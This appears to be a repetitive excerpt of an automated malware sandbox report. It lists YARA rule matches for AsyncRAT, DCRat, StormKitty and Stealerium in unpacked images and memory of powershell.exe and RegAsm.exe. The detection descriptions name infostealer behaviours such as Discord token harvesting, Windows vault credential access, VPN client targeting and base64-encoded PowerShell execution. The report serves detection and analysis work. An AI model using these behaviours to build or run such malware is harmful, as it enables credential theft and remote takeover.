                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects Stealerium based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects StormKitty infostealer Author: ditekSHen
                  Source: 5.2.powershell.exe.29dec28c222.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
                  Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4980, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 4016, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                  Source: Process Memory Space: RegAsm.exe PID: 4508, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                  Source: 5.2.powershell.exe.29dddaa5458.4.raw.unpack, Knvbl.csLong String: Length: 14748
                  Source: 5.2.powershell.exe.29ddc07a518.7.raw.unpack, Knvbl.csLong String: Length: 14748
                  Source: 5.2.powershell.exe.29dddab6a18.6.raw.unpack, Knvbl.csLong String: Length: 14748
                  Source: 5.2.powershell.exe.29df4110000.12.raw.unpack, Knvbl.csLong String: Length: 14748
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01583370 NtProtectVirtualMemory,9_2_01583370
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01582F19 NtProtectVirtualMemory,9_2_01582F19
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34545F805_2_00007FFD34545F80
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454D2EB5_2_00007FFD3454D2EB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454BC905_2_00007FFD3454BC90
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454195D5_2_00007FFD3454195D
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454EA585_2_00007FFD3454EA58
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454BA995_2_00007FFD3454BA99
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454BB3B5_2_00007FFD3454BB3B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD345773C05_2_00007FFD345773C0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3454BC355_2_00007FFD3454BC35
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3456D4005_2_00007FFD3456D400
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_015827A09_2_015827A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_015827929_2_01582792
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_01582F199_2_01582F19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06459E009_2_06459E00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06D674609_2_06D67460
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 9_2_06D600409_2_06D60040
                  Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 5.2.powershell.exe.29dddb68eb8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29ddc0bc858.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dddb632e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29ddc077076.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29ddc07a518.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dddab6a18.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dddaa185e.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.powershell.exe.29dec589c5a.10.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 5.2.powershell.exe.29ddc077076.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.powershell.exe.29debe9c1b2.11.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 9.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 9.2.RegAsm.exe.525b8a.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
                  Source: 5.2.powershell.exe.29dec168498.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                  Source: 5.2.powershell.exe.29dec168498.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
